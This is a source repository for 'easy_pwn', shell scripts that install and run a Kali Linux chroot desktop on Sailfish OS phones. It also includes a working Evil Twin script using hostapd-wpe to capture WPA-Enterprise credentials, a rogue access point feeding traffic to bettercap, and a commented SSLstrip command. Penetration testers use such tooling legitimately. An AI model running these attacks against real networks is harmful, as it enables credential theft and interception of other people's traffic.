├── LICENSE.md
├── README.md
├── deploy
└── configs
│ ├── autostart
│ ├── connman.desktop
│ ├── mousetweaks.desktop
│ ├── nm-applet.desktop
│ ├── xfce4-clipman-plugin-autostart.desktop
│ └── xfce4-power-manager.desktop
│ └── xfce4
│ ├── helpers.rc
│ ├── panel
│ ├── launcher-4
│ │ └── 15735608061.desktop
│ ├── launcher-6
│ │ └── 15771512151.desktop
│ └── launcher-7
│ │ └── 15771451382.desktop
│ └── xfconf
│ └── xfce-perchannel-xml
│ ├── xfce4-desktop.xml
│ ├── xfce4-panel.xml
│ ├── xfce4-power-manager.xml
│ ├── xfwm4.xml
│ └── xsettings.xml
├── easy_pwn.sh
├── mount
├── desktop
│ ├── Xwayland
│ ├── setup_desktop.sh
│ ├── start_desktop.sh
│ └── wayland_wireshark.sh
├── scripts
│ ├── wifi_eviltwin_ap
│ │ ├── dnsmasq.conf
│ │ ├── hostapd-wpe.conf
│ │ └── main.sh
│ └── wifi_rogue_ap
│ │ ├── dnsmasq.conf
│ │ ├── hostapd.conf
│ │ └── main.sh
└── settings.sh
├── src
├── easy_pwn.desktop
├── icon.png
├── readme.md
└── wl_seat.patch
└── wizard.sh
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/README.md:
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1 | # easy_pwn
2 |
3 | easy_pwn is a set of automated scripts designed to setup and run kali linux's chroot environment on Sailfish OS devices.\
4 | It allows to start kali desktop (xfce4) on Xwayland with touch screen support (even undercover mode works), without VNC or other ugly stuff behind.\
5 | Currently rogue access point and EvilTwin attack scripts are implemented, feel free to contribute.
6 |
7 | ## Usage
8 |
9 | ```
10 | easy_pwn.sh [action] [kali-rootfs-path]
11 | ```
12 | available actions:
13 |
14 | - **create** download latest kalifs-armhf from nethunter's repositories, mount it,then install the following packages :
15 | - kali-desktop-xfce : kali default DE (undercover mode works too)
16 | - Xwayland : required to run X
17 | - kali-linux-nethunter : nethunter's default tools metapackage
18 | - mousetweaks : for touch right-click attempt
19 | - matchbox-keyboard : default virtual keyboard
20 | - bettercap and bettercap-ui
21 | - **script** let you run custom scripts, default available scripts are:
22 | - wifi_rogue_ap : set up an open access point, redirect traffic from wlan to mobile data then attach bettercap
23 | - wifi_eviltwin_ap : Evil Twin Attack implementation using hostapd-wpe
24 | - **desktop** set some required environment variables, chroot kali and start xfce desktop
25 | - **shell** run chrooted shell session on fingerterm
26 | - **update** update desktop icons and chroot with latest easy_pwn scripts
27 | - **ssh** start a ssh server inside the chroot on port 2244
28 | - **bettercap** start bettercap web-ui on 127.0.0.1
29 | - **kill** kills all chroot processes
30 | - **quit** umount chroot
31 |
32 |
33 | ## Requirements
34 |
35 | - qxcompositor (https://openrepos.net/content/elros34/qxcompositor), it is required by desktop landscape mode
36 |
37 | ## Screenshots
38 |
39 |
40 |
41 |
42 |
43 |
44 | ## Examples
45 |
46 | **create a kali-chroot**
47 |
48 | ```
49 | $ git clone https://github.com/r3vn/easy_pwn.git
50 | $ cd easy_pwn
51 | $ devel-su
52 | (insert root password)
53 | # ./easy_pwn.sh create /path/to/kali/chroot
54 | ```
55 |
56 | **start kali desktop**
57 |
58 | After the "create" process, an icon called "chrootname" should appaer on sfos's app drawer, so the script can be executed directly from sfos as a normal application.\
59 | To start the script manually:
60 | ```
61 | # ./easy_pwn.sh desktop /path/to/kali/chroot
62 | ```
63 |
64 | **start kali shell on fingerterm**
65 |
66 | ```
67 | # ./easy_pwn.sh shell /path/to/kali/chroot
68 | ```
69 | It is also possible to start a desktop session, in portrait mode, from the shell by running "/opt/easy_pwn/start_desktop.sh" script.
70 |
71 |
72 | **run scripts (example: wifi_rogue_ap)**
73 |
74 | Make sure to have mobile data enabled and wifi enabled and not connected to any access point before proceed.
75 | ```
76 | # ./easy_pwn.sh script /path/to/kali/chroot wifi_rogue_ap
77 | ```
78 |
79 | ## settings
80 | it is possible to edit default settings for easy_pwn and scripts on mount/settings.sh
81 |
82 |
83 | ## todo / known issues
84 |
85 | - ~~Audio doesn't work (fix in progress)~~
86 | - included in the script ~~if your chroot is located under an external sdcard, you may need to remount the sd partition with suid enabled as follows~~
87 | ```
88 | # mount -o remount,suid /media/sdcard/your-partition-name
89 | ```
90 | - Thunar file manager (kali default) crash the session, anyway nautilus works fine.
91 | - mousetweaks longpress works with long double tab ~~No right click on touch-only devices (long press on nautilus seems to work)(fix in progress)~~
92 | - firefox-esr tabs crash with sounds however chromium works very well
93 | - multiarch support
94 | - done. ~~custom scripts~~
95 |
96 | ## devices
97 |
98 | easy_pwn so far was tested on:
99 | - Xperia X Compact with Sailfish OS 3.2.1.20 (Nuuksio)
100 | - Jolla Phone with Sailfish OS 3.2.1.20 (Nuuksio)
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1 | [Desktop Entry]
2 | Encoding=UTF-8
3 | Name=connman-tray
4 | TryExec=connman-gtk --tray
5 | Exec=connman-gtk --tray
6 | Terminal=false
7 | Type=Application
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1 | [Desktop Entry]
2 | Encoding=UTF-8
3 | Name=mousetweaks
4 | TryExec=mousetweaks --ssc --ssc-time=1.0 -t 30
5 | Exec=mousetweaks --ssc --ssc-time=1.0 -t 30
6 | Terminal=false
7 | Type=Application
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1 | [Desktop Entry]
2 | Hidden=true
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1 | [Desktop Entry]
2 | Hidden=false
3 | RunHook=0
4 | TryExec=xfce4-clipman
5 | Exec=xfce4-clipman
6 |
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2 | Hidden=true
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1 | TerminalEmulator=qterminal
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1 | [Desktop Entry]
2 | Version=1.0
3 | Type=Application
4 | Exec=exo-open --launch TerminalEmulator
5 | Icon=utilities-terminal
6 | StartupNotify=true
7 | Terminal=false
8 | Categories=Utility;X-XFCE;X-Xfce-Toplevel;
9 | OnlyShowIn=XFCE;
10 | X-AppStream-Ignore=True
11 | Name=Terminal Emulator
12 | Name[es]=Emulador de terminal
13 | Comment=Use the command line
14 | Comment[es]=Usar la línea de órdenes
15 | X-XFCE-Source=file:///usr/share/applications/exo-terminal-emulator.desktop
16 |
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1 | [Desktop Entry]
2 | Version=1.0
3 | Type=Application
4 | Exec=exo-open --launch TerminalEmulator
5 | Icon=utilities-terminal
6 | StartupNotify=true
7 | Terminal=false
8 | Categories=Utility;X-XFCE;X-Xfce-Toplevel;
9 | OnlyShowIn=XFCE;
10 | X-AppStream-Ignore=True
11 | Name=Terminal Emulator
12 | Name[it]=Emulatore di terminale
13 | Comment=Use the command line
14 | Comment[it]=Usa la linea di comando
15 | X-XFCE-Source=file:///usr/share/applications/exo-terminal-emulator.desktop
16 |
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1 | [Desktop Entry]
2 | Version=1.0
3 | Name=Xfce Terminal
4 | Comment=Terminal Emulator
5 | GenericName=Terminal Emulator
6 | Exec=xfce4-terminal
7 | Icon=utilities-terminal
8 | Terminal=false
9 | Type=Application
10 | Categories=GTK;System;TerminalEmulator;
11 | StartupNotify=true
12 | Actions=preferences;
13 | X-XFCE-Source=file:///usr/share/applications/xfce4-terminal.desktop
14 |
15 | [Desktop Action preferences]
16 | Name=Terminal Preferences
17 | Exec=xfce4-terminal --preferences
18 |
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/easy_pwn.sh:
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1 | #!/bin/bash
2 | # Sailfish OS easy_pwn
3 | #
4 | # Copyright (C) 2020
5 | #
6 | # This program is free software: you can redistribute it and/or modify
7 | # it under the terms of the GNU General Public License as published by
8 | # the Free Software Foundation, either version 3 of the License, or
9 | # (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | # GNU General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU General Public License
17 | # along with this program. If not, see .
18 |
19 | # check privileges
20 | if [ "$EUID" -ne 0 ]
21 | then
22 | echo "[!] run as root"
23 | exit 1
24 | fi
25 |
26 | # check args
27 | if [ "$#" -lt 2 ]
28 | then
29 | echo "[!] usage: $0 [action] [destination-path]"
30 | exit 1
31 | fi
32 |
33 | # set variables
34 | PWN_SH=`readlink -f "$0"`
35 | PWN_DIR=`dirname "$PWN_SH"`
36 | ACTION="$1"
37 | TARGET="$2"
38 | PR_DIR=`dirname "$TARGET"`
39 | CHROOT_NAME=`basename "$TARGET"`
40 | CHROOT_PATH=`readlink -f "$TARGET"`
41 | PWN_ICON=$PWN_DIR/src/icon.png
42 |
43 | # import default settings
44 | . $PWN_DIR/mount/settings.sh
45 |
46 |
47 | kill_chroot() {
48 | # Find processes who's root folder is actually the chroot
49 | # https://askubuntu.com/a/552038
50 |
51 | echo "[!] WARNING : killing all chroot processes"
52 |
53 | for ROOT in $(find /proc/*/root)
54 | do
55 | # Check where the symlink is pointing to
56 | LINK=$(readlink -f $ROOT)
57 |
58 | # If it's pointing to the $CHROOT you set above, kill the process
59 | if echo $LINK | grep -q ${CHROOT_PATH%/}
60 | then
61 | PID=$(basename $(dirname "$ROOT"))
62 | echo "[!] killing $PID"
63 |
64 | # store logs on epw-session.log
65 | kill -9 $PID > /tmp/$CHROOT_NAME/epwn-session.log 2>&1
66 | fi
67 | done
68 | sleep 1
69 |
70 | }
71 |
72 | umount_all(){
73 | # umount the chroot
74 | if mountpoint -q $TARGET/dev/
75 | then
76 | umount -R $TARGET/mnt/easy_pwn
77 | umount -R $TARGET/dev/pts
78 | #umount -R $TARGET/run/display
79 | umount -R $TARGET/run
80 | umount -R $TARGET/tmp/
81 | umount $TARGET/proc/
82 | umount -R $TARGET/dev/
83 | umount -R $TARGET/sys/
84 | umount -R $TARGET/var/lib/dbus
85 | umount -R /run/user/1001/pulse
86 |
87 | echo "[+] chroot umounted"
88 |
89 | sleep 2
90 | else
91 | echo "[-] chroot not mounted"
92 | fi
93 | }
94 |
95 | check_mount() {
96 | # mount dev sys proc
97 | if mountpoint -q $TARGET/dev/
98 | then
99 | echo "[+] chroot mounted"
100 | else
101 | echo "[-] mounting chroot..."
102 |
103 | SD_NAME="0"
104 |
105 | for dir in $(ls /run/media/$PWN_USER)
106 | do
107 | if mountpoint -q "/run/media/$PWN_USER/$dir"
108 | then
109 | # chroot is located on sdcard
110 | # remounting the sdcard with suid enabled
111 | SD_NAME=$dir
112 | fi
113 | done
114 |
115 | if [ "$SD_NAME" != "0" ]
116 | then
117 | echo "[!] warning $CHROOT_NAME seems located on a partition mounted without suid enabled."
118 | echo " we need to remount $SD_NAME with suid enabled in order to proceed."
119 | echo "[?] remount $SD_NAME with setuid enabled? [y/n]"
120 |
121 | read -p "[>] " SUID_SELECTION
122 |
123 | if [ "$SUID_SELECTION" == "y" ]
124 | then
125 | mount -o remount,suid /media/sdcard/$SD_NAME
126 | echo "[-] sdcard remounted."
127 | sleep 1
128 | else
129 | echo "[-] exit."
130 | exit 1
131 | fi
132 |
133 | fi
134 |
135 | # create nemo /run/user directory
136 | mkdir -p /run/user/1001
137 | chown -R $PWN_USER:$PWN_USER /run/user/1001
138 |
139 | # dev sys proc
140 | mount -t proc proc $TARGET/proc/
141 | mount --rbind --make-rslave /sys $TARGET/sys/
142 | mount --rbind --make-rslave /dev $TARGET/dev/
143 |
144 | # mount run
145 | mount --rbind --make-rslave /run $TARGET/run/
146 |
147 | # wayland
148 | #mkdir -p $TARGET/run/display
149 | #mount --rbind --make-rslave /run/display $TARGET/run/display
150 |
151 | # pulseaudio
152 | mkdir -p $TARGET/run/user/1001/pulse
153 | mount --bind /run/user/100000/pulse /run/user/1001/pulse
154 |
155 | # dbus
156 | mkdir -p $TARGET/var/lib/dbus
157 | #mkdir -p $TARGET/run/dbus
158 | #mount --rbind --make-rslave /run/dbus $TARGET/run/dbus
159 | mount --bind --make-slave /var/lib/dbus $TARGET/var/lib/dbus
160 |
161 | # mount devpts
162 | mount --bind --make-slave /dev/pts $TARGET/dev/pts
163 |
164 | # tmp directory
165 | mkdir -p /tmp/$CHROOT_NAME/
166 | chmod 1777 /tmp/$CHROOT_NAME/
167 | mount --bind --make-slave /tmp/$CHROOT_NAME $TARGET/tmp
168 |
169 | # easy_pwn mountpoint
170 | mkdir -p $CHROOT_PATH/mnt/easy_pwn
171 | mount --bind --make-slave $PWN_DIR/mount $CHROOT_PATH/mnt/easy_pwn
172 |
173 | # replace chroot iptables binary with sailfish's iptables
174 | cp -ar /sbin/iptables $CHROOT_PATH/sbin/iptables
175 |
176 | # copy resolv.conf
177 | cp /etc/resolv.conf $TARGET/resolv.conf
178 |
179 | echo "[+] done."
180 |
181 | sleep 2
182 | fi
183 | }
184 |
185 | update_pwn(){
186 | # update easy_pwn kali scripts
187 | # deploy easy pwn
188 | #echo "[-] easy_pwn deploy..."
189 | #mkdir -p $TARGET/mnt/easy_pwn
190 | #cp -avr -T $PWN_DIR/deploy/easy_pwn $TARGET/mnt/easy_pwn
191 |
192 | # deploy xfce configs
193 | echo "[-] user configs deploy..."
194 | mkdir -p $TARGET/home/$PWN_USER/.config
195 | cp -avr -T $PWN_DIR/deploy/configs $TARGET/home/$PWN_USER/.config
196 |
197 | # fix nemo user home permissions
198 | echo "[-] fixing permissions..."
199 | chown -R $PWN_USER:$PWN_USER $TARGET/home/$PWN_USER
200 |
201 | # add execution permissions on /mnt/easy_pwn
202 | chmod +x $PWN_DIR/mount/desktop/setup_desktop.sh
203 | chmod +x $PWN_DIR/mount/desktop/start_desktop.sh
204 |
205 | # add execution permission on wizard.sh
206 | chmod +x $PWN_DIR/wizard.sh
207 | }
208 |
209 | install_icon(){
210 | # install .desktop icon on /home/nemo/.local/share/applications
211 | # overwriting the previous
212 | echo "[-] installing $CHROOT_NAME.desktop in /home/$PWN_USER/.local/share/applications..."
213 | sed "s|XX_PWNPATH_XX|$PWN_DIR|g" $PWN_DIR/src/easy_pwn.desktop > /home/$PWN_USER/.local/share/applications/$CHROOT_NAME.desktop
214 | sed -i "s|XX_NAME_XX|$CHROOT_NAME|g" /home/$PWN_USER/.local/share/applications/$CHROOT_NAME.desktop
215 | sed -i "s|XX_CHROOTPATH_XX|$CHROOT_PATH|g" /home/$PWN_USER/.local/share/applications/$CHROOT_NAME.desktop
216 | sed -i "s|XX_ICON_XX|$PWN_ICON|g" /home/$PWN_USER/.local/share/applications/$CHROOT_NAME.desktop
217 |
218 | sleep 1
219 | }
220 |
221 | start_desktop(){
222 | # start chroot desktop
223 | DESKTOP_ORIENTATION="p" # default portrait
224 |
225 | if [ "$OR_LANDSCAPE" == true ]
226 | then
227 | DESKTOP_ORIENTATION="l"
228 | # set env on sfos qxcompositor
229 | #mkdir -p /run/user/1001
230 | #export $(dbus-launch)
231 | export XDG_RUNTIME_DIR=/run/user/100000
232 | # start qxcompositor
233 | echo "[-] starting qxcompositor..."
234 | su $PWN_USER -c "qxcompositor --wayland-socket-name ../../display/wayland-1" &
235 |
236 | sleep 3
237 |
238 | fi
239 |
240 | # start dbus
241 | #echo "[-] starting chroot's dbus..."
242 | #chroot $TARGET /etc/init.d/dbus start
243 |
244 | # run kali-side script
245 | echo "[-] chrooting..."
246 | # store chroot output on /tmp/easy_pwn/epwn-session.log
247 | chroot $TARGET su $PWN_USER -c "/mnt/easy_pwn/desktop/start_desktop.sh $DESKTOP_ORIENTATION" >> /tmp/$CHROOT_NAME/epwn-session.log 2>&1
248 | }
249 |
250 | get_kali(){
251 | if test -f "/tmp/kalifs-armhf-minimal.tar.xz"
252 | then
253 | echo "[+] found kalifs-armhf-minimal.tar.xz, skipping download"
254 | else
255 | # download latest kalifs armhf build from nethunter mirrors
256 | echo "[-] downloading latest kalifs armhf build from nethunter mirrors..."
257 |
258 | # fix for connection issues
259 | ec=18
260 | while [ $ec -ne 0 ]
261 | do
262 | curl --output /tmp/kalifs-armhf-minimal.tar.xz -O -C - $KALI_IMG
263 | ec=$?
264 | done
265 |
266 | sleep 1
267 | fi
268 |
269 | # untar kalifs archive
270 | echo "[-] unpacking kalifs-armhf-minimal..."
271 | xz -cd /tmp/kalifs-armhf-minimal.tar.xz | tar xvf - -C $PR_DIR
272 | mv $PR_DIR/kali-armhf/ $TARGET/
273 | sleep 1
274 | }
275 |
276 | # check extra args
277 | for i; do
278 | case "$i" in
279 | "--landscape")
280 | # enable landscape
281 | OR_LANDSCAPE=true
282 |
283 | ;;
284 | esac
285 | done
286 |
287 | case "$ACTION" in
288 | "create")
289 | # create a new chroot
290 | # download and untar kali rootfs
291 | get_kali
292 |
293 | # deploy easy_pwn scripts on chroot
294 | update_pwn
295 |
296 | # add desktop launcher
297 | install_icon
298 |
299 | # mount dev sys proc
300 | check_mount
301 |
302 | # run setup-desktop on kali-side
303 | # requires username as first arg
304 | echo "[-] chrooting..."
305 | chroot $TARGET /mnt/easy_pwn/desktop/setup_desktop.sh $PWN_USER
306 | ;;
307 |
308 | "desktop")
309 | # start kali desktop
310 | # check mounts
311 | check_mount
312 |
313 | # start desktop
314 | start_desktop
315 | ;;
316 |
317 | "ssh")
318 | # start sshd inside chroot
319 | # listen on: 0.0.0.0:224/tcp
320 | check_mount
321 |
322 | echo "[-] chrooting..."
323 | chroot $TARGET /usr/sbin/sshd -p2244
324 |
325 | echo "[+] SSHD enabled on tcp port 2244"
326 | ;;
327 |
328 | "bettercap")
329 | # start bettercap webui
330 | # listen on: 127.0.0.1:80/tcp
331 | check_mount
332 |
333 | echo "[-] chrooting..."
334 | chroot $TARGET bettercap -caplet http-ui -iface wlan0
335 | ;;
336 |
337 | "shell")
338 | # start chroot shell
339 | # mount dev sys proc
340 | check_mount
341 |
342 | # run kali-side script
343 | echo "[-] chrooting..."
344 | chroot $TARGET
345 | ;;
346 |
347 | "update")
348 | # deploy easy_pwn
349 | update_pwn
350 |
351 | # install chroot icon
352 | install_icon
353 |
354 | echo "[+] done."
355 | ;;
356 |
357 | "kill")
358 | # experimental
359 | # kill chroot process
360 | kill_chroot
361 |
362 | echo "[+] done."
363 | ;;
364 |
365 | "quit")
366 | # quit chroot
367 | kill_chroot
368 |
369 | echo "[-] umounting chroot..."
370 | umount_all
371 |
372 | echo "[+] kali session closed"
373 | sleep 3
374 | exit 1
375 | ;;
376 | "script")
377 | # execute custom scripts
378 | # check mount
379 | check_mount
380 |
381 | # requires 3 args example:
382 | # ./easy_pwn.sh script /media/sdcard/sdtest/epwn rougue_ap
383 | # check args
384 | if [ "$#" -lt 3 ]
385 | then
386 | echo "[!] script require 3 arguments."
387 | echo " usage: $0 script [destination-path] [script_name]"
388 | exit 1
389 | fi
390 |
391 | # get requested script name
392 | SCRIPT_NAME="$3"
393 |
394 | # check if script main exist
395 | if [[ -f "$CHROOT_PATH/mnt/easy_pwn/scripts/$SCRIPT_NAME/main.sh" ]]
396 | then
397 | # execute the script
398 | echo "[-] loading $SCRIPT_NAME."
399 | chmod +x $CHROOT_PATH/mnt/easy_pwn/scripts/$SCRIPT_NAME/main.sh
400 |
401 | echo "[-] chrooting..."
402 | chroot $TARGET /mnt/easy_pwn/scripts/$SCRIPT_NAME/main.sh
403 |
404 | else
405 | echo "[!] script '$SCRIPT_NAME' not found."
406 | fi
407 |
408 | ;;
409 |
410 | *)
411 | echo "[!] Usage: $0 {create|desktop|shell|update|kill|bettercap|ssh|script|quit} [kali-rootfs-path]"
412 | exit 1
413 | esac
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/mount/desktop/setup_desktop.sh:
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1 | #!/bin/bash
2 | # easy_pwn : setup kali desktop
3 |
4 | # get user
5 | PWN_USER=$1
6 |
7 | # add user
8 | echo "(chroot) [-] adding $PWN_USER user..."
9 | adduser -u 100000 $PWN_USER
10 | cp -avr -T /etc/skel/ /home/$PWN_USER/
11 | chown -R $PWN_USER:$PWN_USER /home/$PWN_USER
12 | usermod -aG sudo,inet,input,audio,users,video $PWN_USER
13 |
14 | # refresh apt
15 | echo "(chroot) [-] updating repositories..."
16 | apt update
17 | sleep 1
18 |
19 | # install packages
20 | echo "(chroot) [-] installing packages (it will take a while)..."
21 | # 1st line is for desktop stuff
22 | # 2nd line for kali-linux metapackages
23 | # 3rd line for easy_pwn additional tools
24 | apt install -y kali-desktop-xfce xwayland matchbox-keyboard mousetweaks connman-gtk \
25 | kali-linux-nethunter \
26 | bettercap bettercap-ui hostapd hostapd-wpe
27 | sleep 1
28 |
29 | # clean apt
30 | echo "(chroot) [-] cleaning apt cache..."
31 | apt clean
32 |
33 | # fixing sudo warnings
34 | echo -e "127.0.0.1\tSailfish" >> /etc/hosts
35 |
36 | # done
37 | echo "(chroot) [+] done! kali chroot is ready to use."
38 | echo "(chroot) [+] Run 'easy_pwn destkop [kalifs-path]' to start the kali desktop, or"
39 | echo "(chroot) [+] Run 'easy_pwn shell [kalifs-path]' to get the kali shell on fingerterm"
40 |
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/mount/desktop/start_desktop.sh:
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1 | #!/bin/bash
2 | # easy_pwn : start kali desktop
3 |
4 | if [ "$1" == "l" ]
5 | then
6 | # Landscape mode
7 | # connect to qxcompositor wayland socket
8 | export WAYLAND_DISPLAY=../../display/wayland-1
9 | else
10 | # Portrait mode
11 | # connect to sfos wayland socket
12 | export WAYLAND_DISPLAY=../../display/wayland-0
13 | fi
14 |
15 | # set env
16 | export XDG_RUNTIME_DIR=/run/user/1001
17 | export DBUS_SESSION_BUS_ADDRESS="unix:path=/run/dbus/system_bus_socket"
18 | export BROWSER="/usr/bin/firefox"
19 | export LANG=C
20 | export QT_QPA_PLATFORM=xcb # force qt applications backend to Xwayland
21 | export $(dbus-launch)
22 |
23 | # Start Xwayland window
24 | /mnt/easy_pwn/desktop/Xwayland &
25 | sleep 3
26 |
27 | # set display to xwayland
28 | export DISPLAY=:0
29 |
30 | # start xfce session
31 | startxfce4
32 |
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/mount/desktop/wayland_wireshark.sh:
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1 | #!/bin/bash
2 | # easy_pwn : [EXPERIMENTAL] start wireshark on wayland display
3 |
4 | if [ "$1" == "l" ]
5 | then
6 | # Landscape mode
7 | # connect to qxcompositor wayland socket
8 | export WAYLAND_DISPLAY=../../display/wayland-1
9 | else
10 | # Portrait mode
11 | # connect to sfos wayland socket
12 | export WAYLAND_DISPLAY=../../display/wayland-0
13 | fi
14 |
15 | # set env
16 | export XDG_RUNTIME_DIR=/run/user/1001
17 | export DBUS_SESSION_BUS_ADDRESS="unix:path=/run/dbus/system_bus_socket"
18 | export BROWSER="/usr/bin/firefox"
19 | export LANG=C
20 | export QT_QPA_PLATFORM=wayland # force qt applications backend to Xwayland
21 | export $(dbus-launch)
22 |
23 | # Start kwin_wayland
24 | #kwin_wayland --wayland-display ../../display/wayland-0 --socket ../../display/wayland-kwin & # --xwayland for xwayland support
25 | #sleep 3
26 |
27 | # set display for xwayland
28 | #export DISPLAY=:0
29 |
30 | # set display for wayland
31 | #export WAYLAND_DISPLAY=../../display/wayland-kwin
32 |
33 | # start wireshark
34 | wireshark
35 |
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/mount/scripts/wifi_eviltwin_ap/dnsmasq.conf:
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1 | # Interface to bind to
2 | interface=wlan0
3 |
4 | # Specify starting_range,end_range,lease_time
5 | dhcp-range=10.0.0.3,10.0.0.20,12h
6 |
7 | # To disable dnsmasq's DNS server functionality.
8 | port=0
9 |
10 | no-resolv
11 |
12 | server=8.8.8.8
13 | server=8.8.4.4
14 |
15 | # Set gateway as Router. Following two lines are identical.
16 | dhcp-option=option:router,10.0.0.1
17 | dhcp-option=3,10.0.0.1
18 |
19 | # Logging.
20 | log-facility=/tmp/rouge_ap-dnsmasq.log # logfile path.
21 | log-async
22 | log-queries # log queries.
23 | log-dhcp # log dhcp related messages.
24 |
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/mount/scripts/wifi_eviltwin_ap/hostapd-wpe.conf:
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1 | eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
2 | ca_cert=/etc/hostapd-wpe/certs/ca.pem
3 | server_cert=/etc/hostapd-wpe/certs/server.pem
4 | private_key=/etc/hostapd-wpe/certs/server.key
5 | private_key_passwd=whatever
6 | dh_file=/etc/hostapd-wpe/certs/dh
7 |
8 | ssid=hostapd-wpe
9 | channel=1
10 |
11 | eap_server=1
12 | eap_fast_a_id=101112131415161718191a1b1c1d1e1f
13 | eap_fast_a_id_info=hostapd-wpe
14 | eap_fast_prov=3
15 | ieee8021x=1
16 | pac_key_lifetime=604800
17 | pac_key_refresh_time=86400
18 | pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
19 | wpa=2
20 | wpa_key_mgmt=WPA-EAP
21 | wpa_pairwise=CCMP
22 | rsn_pairwise=CCMP
23 |
24 | logger_syslog=-1
25 | logger_syslog_level=2
26 | logger_stdout=-1
27 | logger_stdout_level=2
28 |
29 | ctrl_interface=/var/run/hostapd-wpe
30 | ctrl_interface_group=0
31 |
32 | hw_mode=g
33 |
34 | beacon_int=100
35 | dtim_period=2
36 | max_num_sta=255
37 | rts_threshold=-1
38 | fragm_threshold=-1
39 |
40 | macaddr_acl=0
41 |
42 | auth_algs=3
43 | ignore_broadcast_ssid=0
44 |
45 | wmm_enabled=1
46 | wmm_ac_bk_cwmin=4
47 | wmm_ac_bk_cwmax=10
48 | wmm_ac_bk_aifs=7
49 | wmm_ac_bk_txop_limit=0
50 | wmm_ac_bk_acm=0
51 | wmm_ac_be_aifs=3
52 | wmm_ac_be_cwmin=4
53 | wmm_ac_be_cwmax=10
54 | wmm_ac_be_txop_limit=0
55 | wmm_ac_be_acm=0
56 | wmm_ac_vi_aifs=2
57 | wmm_ac_vi_cwmin=3
58 | wmm_ac_vi_cwmax=4
59 | wmm_ac_vi_txop_limit=94
60 | wmm_ac_vi_acm=0
61 | wmm_ac_vo_aifs=2
62 | wmm_ac_vo_cwmin=2
63 | wmm_ac_vo_cwmax=3
64 | wmm_ac_vo_txop_limit=47
65 | wmm_ac_vo_acm=0
66 |
67 | eapol_key_index_workaround=0
68 |
69 | own_ip_addr=127.0.0.1
70 |
71 | eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
72 | ca_cert=/etc/hostapd-wpe/certs/ca.pem
73 | server_cert=/etc/hostapd-wpe/certs/server.pem
74 | private_key=/etc/hostapd-wpe/certs/server.key
75 | private_key_passwd=whatever
76 | dh_file=/etc/hostapd-wpe/certs/dh
77 |
78 | ssid=hostapd-wpe
79 | channel=1
80 |
81 | eap_server=1
82 | eap_fast_a_id=101112131415161718191a1b1c1d1e1f
83 | eap_fast_a_id_info=hostapd-wpe
84 | eap_fast_prov=3
85 | ieee8021x=1
86 | pac_key_lifetime=604800
87 | pac_key_refresh_time=86400
88 | pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
89 | wpa=2
90 | wpa_key_mgmt=WPA-EAP
91 | wpa_pairwise=CCMP
92 | rsn_pairwise=CCMP
93 |
94 | logger_syslog=-1
95 | logger_syslog_level=2
96 | logger_stdout=-1
97 | logger_stdout_level=2
98 |
99 | ctrl_interface=/var/run/hostapd-wpe
100 | ctrl_interface_group=0
101 |
102 | hw_mode=g
103 |
104 | beacon_int=100
105 | dtim_period=2
106 | max_num_sta=255
107 | rts_threshold=-1
108 | fragm_threshold=-1
109 | macaddr_acl=0
110 | auth_algs=3
111 | ignore_broadcast_ssid=0
112 |
113 | wmm_enabled=1
114 | wmm_ac_bk_cwmin=4
115 | wmm_ac_bk_cwmax=10
116 | wmm_ac_bk_aifs=7
117 | wmm_ac_bk_txop_limit=0
118 | wmm_ac_bk_acm=0
119 | wmm_ac_be_aifs=3
120 | wmm_ac_be_cwmin=4
121 | wmm_ac_be_cwmax=10
122 | wmm_ac_be_txop_limit=0
123 | wmm_ac_be_acm=0
124 | wmm_ac_vi_aifs=2
125 | wmm_ac_vi_cwmin=3
126 | wmm_ac_vi_cwmax=4
127 | wmm_ac_vi_txop_limit=94
128 | wmm_ac_vi_acm=0
129 | wmm_ac_vo_aifs=2
130 | wmm_ac_vo_cwmin=2
131 | wmm_ac_vo_cwmax=3
132 | wmm_ac_vo_txop_limit=47
133 | wmm_ac_vo_acm=0
134 |
135 | eapol_key_index_workaround=0
136 | own_ip_addr=127.0.0.1
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/mount/scripts/wifi_eviltwin_ap/main.sh:
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1 | #!/bin/bash
2 | # easy_pwn : rogue access point script
3 |
4 | # load easy_pwn settings
5 | . /mnt/easy_pwn/settings.sh
6 |
7 | echo "(chroot) [!] WARNING: make sure your wifi is enabled in connman"
8 | echo " and not connected, also make sure your mobile data"
9 | echo " is turned on."
10 |
11 | ip addr add 10.0.0.1/24 dev $WLAN_IF
12 | sleep 1
13 |
14 | # Start dnsmasq
15 | echo "(chroot) [-] starting dnsmasq dhcp server..."
16 | if [ -z "$(ps -e | grep dnsmasq)" ]
17 | then
18 | dnsmasq -C /mnt/easy_pwn/scripts/wifi_eviltwin_ap/dnsmasq.conf
19 | fi
20 |
21 | echo "(chroot) [-] forwarding $WLAN_IF traffic to mobile data..."
22 |
23 | # flush iptables
24 | iptables -F
25 | iptables -t nat -F
26 |
27 | # allow in and out
28 | iptables -P INPUT ACCEPT
29 | iptables -P OUTPUT ACCEPT
30 |
31 | # start nat
32 | iptables -t nat -A POSTROUTING -o $MOBILE_IF -j MASQUERADE
33 | iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
34 | iptables -A FORWARD -i $WLAN_IF -j ACCEPT # -o $MOBILE_IF
35 |
36 | # enable ip forwarding
37 | echo "(chroot) [-] enabling ip_forward..."
38 | sysctl -w net.ipv4.ip_forward=1
39 |
40 | # fix for xperia X (and compact)
41 | echo 2 > /sys/module/bcmdhd/parameters/op_mode
42 |
43 | # start hostpad
44 | echo "(chroot) [-] starting hostapd..."
45 | hostapd-wpe -i $WLAN_IF /mnt/easy_pwn/scripts/wifi_eviltwin_ap/hostapd-wpe.conf &
46 | sleep 2
47 |
48 | # start bettercap with webui, sniffer and http proxy with SSLstrip
49 | #echo "(chroot) [-] starting bettercap"
50 | #bettercap -caplet http-ui -iface $WLAN_IF --eval "net.sniff on;set http.proxy.sslstrip true;http.proxy on;"
51 |
52 | # on exit flush iptables
53 | iptables -F
54 | iptables -t nat -F
55 | echo "(chroot) done."
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1 | # Interface to bind to
2 | interface=wlan0
3 |
4 | # Specify starting_range,end_range,lease_time
5 | dhcp-range=10.0.0.3,10.0.0.20,12h
6 |
